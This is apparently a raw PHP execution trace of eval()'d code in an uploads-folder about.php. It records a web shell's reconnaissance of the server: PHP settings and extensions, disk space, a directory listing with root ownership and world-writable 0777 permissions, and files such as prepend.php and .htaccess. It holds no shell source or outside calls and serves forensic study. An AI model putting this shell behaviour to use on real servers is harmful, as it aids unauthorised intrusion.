4	29	0	0.002612	518976	ini_get	0		/var/www/html/uploads/about.php(17) : eval()'d code	47	1	'reqister_globals'
4	29	1	0.002626	519008
4	29	R			FALSE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	47	$r = '<font color=#ccff00>OFF</font>'
3	28	1	0.002651	518976
3	28	R			'<font color=#ccff00>OFF</font>'
3	30	0	0.002666	518976	openbase_dir	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	31	0	0.002679	518976	ini_get	0		/var/www/html/uploads/about.php(17) : eval()'d code	44	1	'open_basedir'
4	31	1	0.002693	519008
4	31	R			''
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	44	$x = ''
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	44	$o = '<font color=#ccff00>OFF</font>'
3	30	1	0.002729	518976
3	30	R			'<font color=#ccff00>OFF</font>'
3	32	0	0.002744	518976	myql	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	33	0	0.002756	518976	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	50	1	'mysql_connect'
4	33	1	0.002770	519016
4	33	R			FALSE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	50	$m = '<font color=#ccff00>OFF</font>'
3	32	1	0.002796	518976
3	32	R			'<font color=#ccff00>OFF</font>'
3	34	0	0.002811	518976	gzip	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	35	0	0.002823	518976	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	52	1	'gzencode'
4	35	1	0.002837	519016
4	35	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	52	$m = '<font color=crimson>ON</font>'
3	34	1	0.002863	518976
3	34	R			'<font color=crimson>ON</font>'
3	36	0	0.002878	518976	mssql	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	37	0	0.002890	518976	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	51	1	'mssql_connect'
4	37	1	0.002904	519016
4	37	R			FALSE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	51	$m = '<font color=#ccff00>OFF</font>'
3	36	1	0.002929	518976
3	36	R			'<font color=#ccff00>OFF</font>'
3	38	0	0.002944	518976	postgresql	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	39	0	0.002956	518976	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	49	1	'pg_connect'
4	39	1	0.002970	519016
4	39	R			FALSE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	49	$p = '<font color=#ccff00>OFF</font>'
3	38	1	0.002995	518976
3	38	R			'<font color=#ccff00>OFF</font>'
3	40	0	0.003013	518976	oracle	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	41	0	0.003026	518976	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	48	1	'ocilogon'
4	41	1	0.003039	519016
4	41	R			FALSE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	48	$o = '<font color=#ccff00>OFF</font>'
3	40	1	0.003064	518976
3	40	R			'<font color=#ccff00>OFF</font>'
3	42	0	0.003079	518976	disk_total_space	0		/var/www/html/uploads/about.php(17) : eval()'d code	9	1	'/'
3	42	1	0.003095	519008
3	42	R			232015802368
3	43	0	0.003110	518976	h_size	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	1	232015802368
4	44	0	0.003125	518976	round	0		/var/www/html/uploads/about.php(17) : eval()'d code	53	1	21608.155441284
4	44	1	0.003138	519008
4	44	R			21608
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	53	$s = '216.08GB'
3	43	1	0.003164	519016
3	43	R			'216.08GB'
3	45	0	0.003178	519016	disk_free_space	0		/var/www/html/uploads/about.php(17) : eval()'d code	9	1	'/'
3	45	1	0.003193	519048
3	45	R			195470544896
3	46	0	0.003207	519016	h_size	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	1	195470544896
4	47	0	0.003220	519016	round	0		/var/www/html/uploads/about.php(17) : eval()'d code	53	1	18204.613113403
4	47	1	0.003234	519048
4	47	R			18205
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	53	$s = '182.05GB'
3	46	1	0.003259	519056
3	46	R			'182.05GB'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '182.05GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'PHP Version'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Zend Version'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Magic Quotes'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Curl'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Register Globals'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'OpenBase Dir'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'MySQL'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Gzip'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'MsSQL'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'PostgreSQL'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Oracle'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Total Space'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Used Space'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Your IP'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	9	$n = 'Server IP'
3	48	0	0.003474	519056	curpath	1		/var/www/html/uploads/about.php(17) : eval()'d code	33	1	''
4	49	0	0.003488	519056	getcwd	0		/var/www/html/uploads/about.php(17) : eval()'d code	54	0
4	49	1	0.003501	519104
4	49	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$d = '/var/www/html/uploads'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$p = ''
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$n = ''
4	50	0	0.003547	519104	explode	0		/var/www/html/uploads/about.php(17) : eval()'d code	54	2	'/'	'/var/www/html/uploads'
4	50	1	0.003562	519680
4	50	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$i = 0
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$g = ''
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$p .= '/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$n .= '<a href="?d=/"></a>/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$i++
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$g = 'var'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$p .= 'var/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$n .= '<a href="?d=/var/">var</a>/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$i++
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$g = 'www'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$p .= 'www/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$n .= '<a href="?d=/var/www/">www</a>/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$i++
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$g = 'html'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$p .= 'html/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$n .= '<a href="?d=/var/www/html/">html</a>/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$i++
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$g = 'uploads'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$p .= 'uploads/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	54	$i++
3	48	1	0.003813	519248
3	48	R			'<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
3	51	0	0.003837	519168	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	34	1	'.'
3	51	1	0.003852	519248
3	51	R			'/var/www/html/uploads'
3	52	0	0.003868	519392	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	34	1	'.'
3	52	1	0.003882	519472
3	52	R			'/var/www/html/uploads'
3	53	0	0.003897	519552	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	34	1	'.'
3	53	1	0.003911	519632
3	53	R			'/var/www/html/uploads'
3	54	0	0.003925	519616	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	34	1	'.'
3	54	1	0.003938	519696
3	54	R			'/var/www/html/uploads'
3	55	0	0.003953	519936	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	34	1	'.'
3	55	1	0.003966	520016
3	55	R			'/var/www/html/uploads'
3	56	0	0.003981	520064	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	34	1	'.'
3	56	1	0.003994	520144
3	56	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	36	$filex = []
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	37	$dirx = []
3	57	0	0.004031	519168	opendir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	'.'
3	57	1	0.004050	519560
3	57	R			resource(4) of type (stream)
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$handle = resource(4) of type (stream)
3	58	0	0.004079	519528	readdir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	resource(4) of type (stream)
3	58	1	0.004100	519600
3	58	R			'..'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$file = '..'
3	59	0	0.004125	519560	is_dir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	'..'
3	59	1	0.004140	519608
3	59	R			TRUE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$dirx[] .= '..'
3	60	0	0.004165	519976	readdir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	resource(4) of type (stream)
3	60	1	0.004180	520048
3	60	R			'.'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$file = '.'
3	61	0	0.004204	519976	is_dir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	'.'
3	61	1	0.004218	520016
3	61	R			TRUE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$dirx[] .= '.'
3	62	0	0.004242	520008	readdir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	resource(4) of type (stream)
3	62	1	0.004256	520088
3	62	R			'prepend.php'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$file = 'prepend.php'
3	63	0	0.004286	520016	is_dir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	'prepend.php'
3	63	1	0.004302	520064
3	63	R			FALSE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$filex[] .= 'prepend.php'
3	64	0	0.004327	520440	readdir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	resource(4) of type (stream)
3	64	1	0.004340	520512
3	64	R			'data'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$file = 'data'
3	65	0	0.004364	520432	is_dir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	'data'
3	65	1	0.004379	520464
3	65	R			TRUE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$dirx[] .= 'data'
3	66	0	0.004403	520456	readdir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	resource(4) of type (stream)
3	66	1	0.004416	520536
3	66	R			'.htaccess'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$file = '.htaccess'
3	67	0	0.004440	520464	is_dir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	'.htaccess'
3	67	1	0.004455	520512
3	67	R			FALSE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$filex[] .= '.htaccess'
3	68	0	0.004479	520512	readdir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	resource(4) of type (stream)
3	68	1	0.004493	520592
3	68	R			'about.php'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$file = 'about.php'
3	69	0	0.004517	520512	is_dir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	'about.php'
3	69	1	0.004532	520552
3	69	R			FALSE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$filex[] .= 'about.php'
3	70	0	0.004557	520552	readdir	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	resource(4) of type (stream)
3	70	1	0.004571	520592
3	70	R			FALSE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$file = FALSE
3	71	0	0.004595	520536	asort	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	[0 => 'prepend.php', 1 => '.htaccess', 2 => 'about.php']
3	71	1	0.004613	520568
3	71	R			TRUE
3	72	0	0.004626	520560	asort	0		/var/www/html/uploads/about.php(17) : eval()'d code	39	1	[0 => '..', 1 => '.', 2 => 'data']
3	72	1	0.004642	520592
3	72	R			TRUE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	39	$i = 0
3	73	0	0.004666	520560	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'posix_getpwuid'
3	73	1	0.004680	520600
3	73	R			TRUE
3	74	0	0.004692	520560	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'posix_getgrgid'
3	74	1	0.004706	520600
3	74	R			TRUE
3	75	0	0.004718	520560	fileowner	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	75	1	0.004734	520592
3	75	R			0
3	76	0	0.004746	520552	posix_getpwuid	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	0
3	76	1	0.004772	521352
3	76	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	77	0	0.004814	521320	filegroup	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	77	1	0.004827	521360
3	77	R			0
3	78	0	0.004840	521320	posix_getgrgid	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	0
3	78	1	0.004864	521976
3	78	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	79	0	0.004899	522008	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	79	1	0.004914	522088
3	79	R			'/var/www/html/uploads'
3	80	0	0.004929	522104	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	80	1	0.004944	522184
3	80	R			'/var/www/html/uploads'
3	81	0	0.004962	522168	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	81	1	0.004976	522248
3	81	R			'/var/www/html/uploads'
3	82	0	0.004991	522584	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	82	1	0.005004	522664
3	82	R			'/var/www/html/uploads'
3	83	0	0.005018	522584	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	83	1	0.005032	522664
3	83	R			'/var/www/html/uploads'
3	84	0	0.005050	522840	get_color	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
4	85	0	0.005063	522840	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.'
4	85	1	0.005100	522880
4	85	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	55	$c = '#ccff00'
4	86	0	0.005200	522840	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.'
4	86	1	0.005217	522880
4	86	R			TRUE
4	87	0	0.005230	522840	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'.'
4	87	1	0.005245	522880
4	87	R			TRUE
3	84	1	0.005257	522840
3	84	R			'#ccff00'
3	88	0	0.005272	522840	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
4	89	0	0.005285	522840	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.'
4	89	1	0.005300	522880
4	89	R			TRUE
4	90	0	0.005313	522840	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.'
4	90	1	0.005327	522880
4	90	R			16895
4	91	0	0.005340	522840	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	16895
4	91	1	0.005355	523224
4	91	R			'40777'
4	92	0	0.005368	523160	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'40777'	-4
4	92	1	0.005381	523256
4	92	R			'0777'
3	88	1	0.005395	522872
3	88	R			'0777'
3	93	0	0.005408	522968	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	93	1	0.005422	523048
3	93	R			'/var/www/html/uploads'
3	94	0	0.005437	522968	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	94	1	0.005451	523048
3	94	R			'/var/www/html/uploads'
3	95	0	0.005465	523224	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
4	96	0	0.005478	523224	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.'
4	96	1	0.005493	523264
4	96	R			TRUE
4	97	0	0.005506	523224	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'.'
4	97	1	0.005519	523264
4	97	R			16895
4	98	0	0.005532	523224	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	16895
4	98	1	0.005546	523608
4	98	R			'40777'
4	99	0	0.005558	523544	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'40777'	-4
4	99	1	0.005572	523640
4	99	R			'0777'
3	95	1	0.005585	523256
3	95	R			'0777'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$i++
3	100	0	0.005610	521944	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'posix_getpwuid'
3	100	1	0.005625	521984
3	100	R			TRUE
3	101	0	0.005637	521944	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'posix_getgrgid'
3	101	1	0.005651	521984
3	101	R			TRUE
3	102	0	0.005664	521944	fileowner	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
3	102	1	0.005679	521984
3	102	R			0
3	103	0	0.005692	521944	posix_getpwuid	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	0
3	103	1	0.005717	522744
3	103	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	104	0	0.005759	521944	filegroup	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
3	104	1	0.005773	521984
3	104	R			0
3	105	0	0.005786	521944	posix_getgrgid	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	0
3	105	1	0.005814	522600
3	105	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	106	0	0.005850	522008	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
3	106	1	0.005865	522080
3	106	R			'/var/www/html'
3	107	0	0.005880	522104	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	107	1	0.005894	522184
3	107	R			'/var/www/html/uploads'
3	108	0	0.005909	522168	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	108	1	0.005923	522248
3	108	R			'/var/www/html/uploads'
3	109	0	0.005938	522584	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	109	1	0.005951	522664
3	109	R			'/var/www/html/uploads'
3	110	0	0.005965	522584	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
3	110	1	0.005979	522656
3	110	R			'/var/www/html'
3	111	0	0.005993	522840	get_color	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
4	112	0	0.006007	522840	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'..'
4	112	1	0.006023	522880
4	112	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	55	$c = '#ccff00'
4	113	0	0.006047	522840	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'..'
4	113	1	0.006062	522880
4	113	R			TRUE
4	114	0	0.006075	522840	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'..'
4	114	1	0.006089	522880
4	114	R			TRUE
3	111	1	0.006102	522840
3	111	R			'#ccff00'
3	115	0	0.006116	522840	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
4	116	0	0.006129	522840	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'..'
4	116	1	0.006144	522880
4	116	R			TRUE
4	117	0	0.006156	522840	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'..'
4	117	1	0.006169	522880
4	117	R			16895
4	118	0	0.006182	522840	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	16895
4	118	1	0.006196	523224
4	118	R			'40777'
4	119	0	0.006209	523160	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'40777'	-4
4	119	1	0.006223	523256
4	119	R			'0777'
3	115	1	0.006244	522872
3	115	R			'0777'
3	120	0	0.006258	522968	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	120	1	0.006273	523048
3	120	R			'/var/www/html/uploads'
3	121	0	0.006288	522968	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
3	121	1	0.006302	523040
3	121	R			'/var/www/html'
3	122	0	0.006316	523224	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'..'
4	123	0	0.006329	523224	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'..'
4	123	1	0.006344	523264
4	123	R			TRUE
4	124	0	0.006357	523224	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'..'
4	124	1	0.006370	523264
4	124	R			16895
4	125	0	0.006383	523224	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	16895
4	125	1	0.006397	523608
4	125	R			'40777'
4	126	0	0.006410	523544	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'40777'	-4
4	126	1	0.006423	523640
4	126	R			'0777'
3	122	1	0.006436	523256
3	122	R			'0777'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$i++
3	127	0	0.006461	521944	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'posix_getpwuid'
3	127	1	0.006475	521984
3	127	R			TRUE
3	128	0	0.006488	521944	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'posix_getgrgid'
3	128	1	0.006502	521984
3	128	R			TRUE
3	129	0	0.006514	521944	fileowner	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
3	129	1	0.006530	521984
3	129	R			0
3	130	0	0.006546	521944	posix_getpwuid	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	0
3	130	1	0.006571	522744
3	130	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	131	0	0.006612	521944	filegroup	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
3	131	1	0.006626	521984
3	131	R			0
3	132	0	0.006639	521944	posix_getgrgid	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	0
3	132	1	0.006661	522600
3	132	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	133	0	0.006697	522024	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
3	133	1	0.006713	522112
3	133	R			'/var/www/html/uploads/data'
3	134	0	0.006729	522136	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	134	1	0.006743	522216
3	134	R			'/var/www/html/uploads'
3	135	0	0.006758	522200	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	135	1	0.006771	522280
3	135	R			'/var/www/html/uploads'
3	136	0	0.006786	522584	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	136	1	0.006799	522664
3	136	R			'/var/www/html/uploads'
3	137	0	0.006813	522584	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
3	137	1	0.006827	522672
3	137	R			'/var/www/html/uploads/data'
3	138	0	0.006842	522968	get_color	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
4	139	0	0.006855	522968	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'data'
4	139	1	0.006871	523008
4	139	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	55	$c = '#ccff00'
4	140	0	0.006896	522968	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'data'
4	140	1	0.006911	523008
4	140	R			TRUE
4	141	0	0.006924	522968	is_writable	0		/var/www/html/uploads/about.php(17) : eval()'d code	55	1	'data'
4	141	1	0.006939	523008
4	141	R			TRUE
3	138	1	0.006952	522968
3	138	R			'#ccff00'
3	142	0	0.006965	522968	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
4	143	0	0.006978	522968	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'data'
4	143	1	0.006993	523008
4	143	R			TRUE
4	144	0	0.007006	522968	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'data'
4	144	1	0.007019	523008
4	144	R			16895
4	145	0	0.007032	522968	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	16895
4	145	1	0.007046	523352
4	145	R			'40777'
4	146	0	0.007059	523288	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'40777'	-4
4	146	1	0.007072	523384
4	146	R			'0777'
3	142	1	0.007085	523000
3	142	R			'0777'
3	147	0	0.007098	522968	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'.'
3	147	1	0.007112	523048
3	147	R			'/var/www/html/uploads'
3	148	0	0.007127	523224	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
3	148	1	0.007141	523312
3	148	R			'/var/www/html/uploads/data'
3	149	0	0.007155	523224	perms	1		/var/www/html/uploads/about.php(17) : eval()'d code	40	1	'data'
4	150	0	0.007168	523224	file_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'data'
4	150	1	0.007183	523264
4	150	R			TRUE
4	151	0	0.007196	523224	fileperms	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	1	'data'
4	151	1	0.007208	523264
4	151	R			16895
4	152	0	0.007221	523224	sprintf	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'%o'	16895
4	152	1	0.007235	523608
4	152	R			'40777'
4	153	0	0.007248	523544	substr	0		/var/www/html/uploads/about.php(17) : eval()'d code	56	2	'40777'	-4
4	153	1	0.007265	523640
4	153	R			'0777'
3	149	1	0.007278	523256
3	149	R			'0777'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	40	$i++
3	154	0	0.007403	521944	function_exists	0		/var/www/html/uploads/about.php(17) : eval()'d code	41	1	'posix_getpwuid'
3	154	1	0.007418	521984
3	154	R			TRUE
